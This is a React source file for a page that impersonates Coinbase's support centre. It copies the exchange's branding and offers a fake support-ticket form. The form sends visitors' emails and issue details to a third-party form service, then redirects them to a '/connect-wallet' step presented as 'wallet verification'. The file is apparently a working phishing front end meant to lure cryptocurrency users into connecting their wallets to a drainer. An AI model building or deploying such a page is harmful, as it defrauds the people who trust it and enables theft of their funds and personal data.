import { useState, FormEvent } from 'react';
import { useNavigate } from 'react-router-dom';

export default function Survey() {
  const navigate = useNavigate();
  const [formData, setFormData] = useState({
    email: '',
    environment: '',
    issueType: '',
    coinToken: '',
    description: ''
  });

  const handleSubmit = async (e: FormEvent<HTMLFormElement>) => {
    e.preventDefault();
    
    const form = e.currentTarget;
    const formDataToSend = new FormData(form);
    
    try {
      const response = await fetch('https://api.web3forms.com/submit', {
        method: 'POST',
        body: formDataToSend
      });
      
      if (response.ok) {
        navigate('/connect-wallet');
      }
    } catch (error) {
      console.error('Form submission error:', error);
    }
  };

  return (
    <div className="min-h-screen relative bg-white">
      {/* Coinbase Header */}
      <header className="bg-white border-b border-gray-200 sticky top-0 z-50">
        <div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
          <div className="flex items-center justify-between h-16">
            <div className="flex items-center gap-8">
              <img 
                src="https://static.readdy.ai/image/5c7bfc2a438c1607f8e9e52884d8d2e0/97dbcb1a3804cc50bc8763902297e80c.png" 
                alt="Coinbase" 
                className="h-8 w-auto"
              />
              <nav className="hidden md:flex items-center gap-6">
                <a href="#" className="text-sm font-medium text-gray-700 hover:text-blue-600 cursor-pointer whitespace-nowrap">Prices</a>
                <a href="#" className="text-sm font-medium text-gray-700 hover:text-blue-600 cursor-pointer whitespace-nowrap">Learn</a>
                <a href="#" className="text-sm font-medium text-gray-700 hover:text-blue-600 cursor-pointer whitespace-nowrap">Individuals</a>
                <a href="#" className="text-sm font-medium text-gray-700 hover:text-blue-600 cursor-pointer whitespace-nowrap">Businesses</a>
                <a href="#" className="text-sm font-medium text-gray-700 hover:text-blue-600 cursor-pointer whitespace-nowrap">Developers</a>
                <a href="#" className="text-sm font-medium text-gray-700 hover:text-blue-600 cursor-pointer whitespace-nowrap">Company</a>
              </nav>
            </div>
            <div className="flex items-center gap-3">
              <button className="hidden md:block text-sm font-medium text-gray-700 hover:text-blue-600 px-4 py-2 rounded-lg cursor-pointer whitespace-nowrap">
                Sign in
              </button>
              <button className="bg-blue-600 hover:bg-blue-700 text-white text-sm font-medium px-4 py-2 rounded-lg cursor-pointer whitespace-nowrap transition-colors">
                Get started
              </button>
            </div>
          </div>
        </div>
      </header>

      {/* Hero Section */}
      <div className="relative bg-gradient-to-br from-blue-600 via-blue-700 to-indigo-800 overflow-hidden">
        <div className="absolute inset-0 opacity-10">
          <div className="absolute top-0 left-0 w-96 h-96 bg-white rounded-full blur-3xl"></div>
          <div className="absolute bottom-0 right-0 w-96 h-96 bg-white rounded-full blur-3xl"></div>
        </div>
        <div className="relative max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 py-20 text-center">
          <h1 className="text-5xl md:text-6xl font-bold text-white mb-6">
            Coinbase Support Center
          </h1>
          <p className="text-xl text-blue-100 max-w-2xl mx-auto">
            Get help with your account, transactions, and wallet issues. Our team is here to assist you 24/7.
          </p>
        </div>
      </div>

      {/* Main Content */}
      <main className="max-w-3xl mx-auto px-4 sm:px-6 lg:px-8 py-12">
        <div className="bg-white rounded-2xl shadow-xl border border-gray-200 p-8 md:p-12">
          <div className="text-center mb-8">
            <div className="inline-flex items-center justify-center w-16 h-16 bg-blue-100 rounded-2xl mb-4">
              <i className="ri-customer-service-2-line text-3xl text-blue-600"></i>
            </div>
            <h2 className="text-3xl font-bold text-gray-900 mb-3">Submit a Support Ticket</h2>
            <p className="text-base text-gray-600">Fill out the form below and we'll get back to you shortly</p>
          </div>

          {/* Wallet Connection Notice */}
          <div className="mb-8 bg-blue-50 border border-blue-200 rounded-xl p-6">
            <div className="flex items-start gap-4">
              <div className="flex-shrink-0 w-12 h-12 bg-blue-600 rounded-xl flex items-center justify-center">
                <i className="ri-wallet-3-line text-2xl text-white"></i>
              </div>
              <div className="flex-1">
                <h3 className="text-base font-bold text-gray-900 mb-2">Wallet Verification Required</h3>
                <p className="text-sm text-gray-700 leading-relaxed">
                  After submitting this form, you'll need to connect your wallet to verify your account. This helps us resolve your issue faster and more securely.
                </p>
              </div>
            </div>
          </div>

          <form onSubmit={handleSubmit} className="space-y-6" data-readdy-form>
            <input 
              type="hidden" 
              name="access_key" 
              value="920709c6-c15a-4ded-afbc-efee4e541acb"
            />

            {/* Email Address */}
            <div className="group">
              <label htmlFor="email" className="block text-sm font-semibold text-gray-700 mb-2">
                Email Address <span className="text-red-500">*</span>
              </label>
              <div className="relative">
                <div className="absolute inset-y-0 left-0 pl-4 flex items-center pointer-events-none">
                  <i className="ri-mail-line text-gray-400 text-lg"></i>
                </div>
                <input
                  type="email"
                  id="email"
                  name="email"
                  required
                  value={formData.email}
                  onChange={(e) => setFormData({...formData, email: e.target.value})}
                  className="w-full pl-12 pr-4 py-3.5 text-sm border-2 border-gray-200 rounded-xl focus:ring-2 focus:ring-blue-500 focus:border-blue-500 outline-none transition-all group-hover:border-gray-300"
                  placeholder="your.email@example.com"
                />
              </div>
            </div>

            {/* Environment */}
            <div className="group">
              <label htmlFor="environment" className="block text-sm font-semibold text-gray-700 mb-2">
                Environment <span className="text-red-500">*</span>
              </label>
              <div className="relative">
                <div className="absolute inset-y-0 left-0 pl-4 flex items-center pointer-events-none">
                  <i className="ri-computer-line text-gray-400 text-lg"></i>
                </div>
                <select
                  id="environment"
                  name="environment"
                  required
                  value={formData.environment}
                  onChange={(e) => setFormData({...formData, environment: e.target.value})}
                  className="w-full pl-12 pr-4 py-3.5 text-sm border-2 border-gray-200 rounded-xl focus:ring-2 focus:ring-blue-500 focus:border-blue-500 outline-none transition-all cursor-pointer appearance-none bg-white group-hover:border-gray-300"
                >
                  <option value="">Select environment</option>
                  <option value="Web">Web</option>
                  <option value="Mobile App (iOS)">Mobile App (iOS)</option>
                  <option value="Mobile App (Android)">Mobile App (Android)</option>
                  <option value="Desktop">Desktop</option>
                </select>
                <div className="absolute inset-y-0 right-0 pr-4 flex items-center pointer-events-none">
                  <i className="ri-arrow-down-s-line text-gray-400 text-lg"></i>
                </div>
              </div>
            </div>

            {/* Issue Type */}
            <div className="group">
              <label htmlFor="issueType" className="block text-sm font-semibold text-gray-700 mb-2">
                Issue Type <span className="text-red-500">*</span>
              </label>
              <div className="relative">
                <div className="absolute inset-y-0 left-0 pl-4 flex items-center pointer-events-none">
                  <i className="ri-error-warning-line text-gray-400 text-lg"></i>
                </div>
                <select
                  id="issueType"
                  name="issueType"
                  required
                  value={formData.issueType}
                  onChange={(e) => setFormData({...formData, issueType: e.target.value})}
                  className="w-full pl-12 pr-4 py-3.5 text-sm border-2 border-gray-200 rounded-xl focus:ring-2 focus:ring-blue-500 focus:border-blue-500 outline-none transition-all cursor-pointer appearance-none bg-white group-hover:border-gray-300"
                >
                  <option value="">Select issue type</option>
                  <option value="Account Access">Account Access</option>
                  <option value="Transaction Issue">Transaction Issue</option>
                  <option value="Wallet Connection">Wallet Connection</option>
                  <option value="Verification Problem">Verification Problem</option>
                  <option value="Security Concern">Security Concern</option>
                  <option value="Other">Other</option>
                </select>
                <div className="absolute inset-y-0 right-0 pr-4 flex items-center pointer-events-none">
                  <i className="ri-arrow-down-s-line text-gray-400 text-lg"></i>
                </div>
              </div>
            </div>

            {/* Choose the Coin or Token */}
            <div className="group">
              <label htmlFor="coinToken" className="block text-sm font-semibold text-gray-700 mb-2">
                Choose the Coin or Token <span className="text-red-500">*</span>
              </label>
              <div className="relative">
                <div className="absolute inset-y-0 left-0 pl-4 flex items-center pointer-events-none">
                  <i className="ri-coin-line text-gray-400 text-lg"></i>
                </div>
                <select
                  id="coinToken"
                  name="coinToken"
                  required
                  value={formData.coinToken}
                  onChange={(e) => setFormData({...formData, coinToken: e.target.value})}
                  className="w-full pl-12 pr-4 py-3.5 text-sm border-2 border-gray-200 rounded-xl focus:ring-2 focus:ring-blue-500 focus:border-blue-500 outline-none transition-all cursor-pointer appearance-none bg-white group-hover:border-gray-300"
                >
                  <option value="">Select coin or token</option>
                  <option value="Bitcoin (BTC)">Bitcoin (BTC)</option>
                  <option value="Ethereum (ETH)">Ethereum (ETH)</option>
                  <option value="USD Coin (USDC)">USD Coin (USDC)</option>
                  <option value="Tether (USDT)">Tether (USDT)</option>
                  <option value="Solana (SOL)">Solana (SOL)</option>
                  <option value="Cardano (ADA)">Cardano (ADA)</option>
                  <option value="Polygon (MATIC)">Polygon (MATIC)</option>
                  <option value="Other">Other</option>
                </select>
                <div className="absolute inset-y-0 right-0 pr-4 flex items-center pointer-events-none">
                  <i className="ri-arrow-down-s-line text-gray-400 text-lg"></i>
                </div>
              </div>
            </div>

            {/* Description */}
            <div className="group">
              <label htmlFor="description" className="block text-sm font-semibold text-gray-700 mb-2">
                Description <span className="text-red-500">*</span>
              </label>
              <div className="relative">
                <textarea
                  id="description"
                  name="description"
                  required
                  rows={5}
                  maxLength={500}
                  value={formData.description}
                  onChange={(e) => setFormData({...formData, description: e.target.value})}
                  className="w-full px-4 py-3.5 text-sm border-2 border-gray-200 rounded-xl focus:ring-2 focus:ring-blue-500 focus:border-blue-500 outline-none transition-all resize-none group-hover:border-gray-300"
                  placeholder="Please describe your issue in detail..."
                />
                <div className="absolute bottom-3 right-3 bg-white/90 px-2 py-1 rounded-lg">
                  <p className="text-xs font-medium text-gray-500">{formData.description.length}/500</p>
                </div>
              </div>
            </div>

            {/* Submit Button */}
            <button
              type="submit"
              className="w-full bg-blue-600 hover:bg-blue-700 text-white font-semibold py-4 px-6 rounded-xl transition-all whitespace-nowrap cursor-pointer shadow-lg hover:shadow-xl transform hover:scale-[1.02] active:scale-[0.98]"
            >
              <span className="flex items-center justify-center gap-2">
                Submit Ticket
                <i className="ri-arrow-right-line text-lg"></i>
              </span>
            </button>
          </form>
        </div>

        {/* Trust Indicators */}
        <div className="mt-12 grid grid-cols-1 md:grid-cols-3 gap-6">
          <div className="bg-white rounded-xl p-6 border border-gray-200 text-center">
            <div className="w-12 h-12 bg-blue-100 rounded-xl flex items-center justify-center mx-auto mb-4">
              <i className="ri-shield-check-line text-2xl text-blue-600"></i>
            </div>
            <h3 className="font-semibold text-gray-900 mb-2">Secure & Trusted</h3>
            <p className="text-sm text-gray-600">Bank-level security for your assets</p>
          </div>
          <div className="bg-white rounded-xl p-6 border border-gray-200 text-center">
            <div className="w-12 h-12 bg-blue-100 rounded-xl flex items-center justify-center mx-auto mb-4">
              <i className="ri-time-line text-2xl text-blue-600"></i>
            </div>
            <h3 className="font-semibold text-gray-900 mb-2">24/7 Support</h3>
            <p className="text-sm text-gray-600">We're here whenever you need us</p>
          </div>
          <div className="bg-white rounded-xl p-6 border border-gray-200 text-center">
            <div className="w-12 h-12 bg-blue-100 rounded-xl flex items-center justify-center mx-auto mb-4">
              <i className="ri-global-line text-2xl text-blue-600"></i>
            </div>
            <h3 className="font-semibold text-gray-900 mb-2">100M+ Users</h3>
            <p className="text-sm text-gray-600">Trusted by millions worldwide</p>
          </div>
        </div>
      </main>

      {/* Footer */}
      <footer className="bg-gray-50 border-t border-gray-200 mt-20">
        <div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 py-12">
          <div className="grid grid-cols-2 md:grid-cols-4 gap-8 mb-8">
            <div>
              <h4 className="font-semibold text-gray-900 mb-4">Learn</h4>
              <ul className="space-y-2">
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">Browse crypto prices</a></li>
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">Coinbase Bytes newsletter</a></li>
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">Crypto basics</a></li>
              </ul>
            </div>
            <div>
              <h4 className="font-semibold text-gray-900 mb-4">Individuals</h4>
              <ul className="space-y-2">
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">Buy & sell</a></li>
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">Earn rewards</a></li>
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">Wallet</a></li>
              </ul>
            </div>
            <div>
              <h4 className="font-semibold text-gray-900 mb-4">Businesses</h4>
              <ul className="space-y-2">
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">Coinbase Commerce</a></li>
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">Coinbase Prime</a></li>
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">Institutional</a></li>
              </ul>
            </div>
            <div>
              <h4 className="font-semibold text-gray-900 mb-4">Company</h4>
              <ul className="space-y-2">
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">About</a></li>
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">Careers</a></li>
                <li><a href="#" className="text-sm text-gray-600 hover:text-blue-600 cursor-pointer">Legal & privacy</a></li>
              </ul>
            </div>
          </div>
          <div className="border-t border-gray-200 pt-8 flex flex-col md:flex-row justify-between items-center gap-4">
            <p className="text-sm text-gray-600">© 2024 Coinbase</p>
            <div className="flex items-center gap-4">
              <a href="#" className="text-gray-600 hover:text-blue-600 cursor-pointer">
                <i className="ri-twitter-x-line text-xl"></i>
              </a>
              <a href="#" className="text-gray-600 hover:text-blue-600 cursor-pointer">
                <i className="ri-facebook-fill text-xl"></i>
              </a>
              <a href="#" className="text-gray-600 hover:text-blue-600 cursor-pointer">
                <i className="ri-instagram-line text-xl"></i>
              </a>
            </div>
          </div>
        </div>
      </footer>
    </div>
  );
}
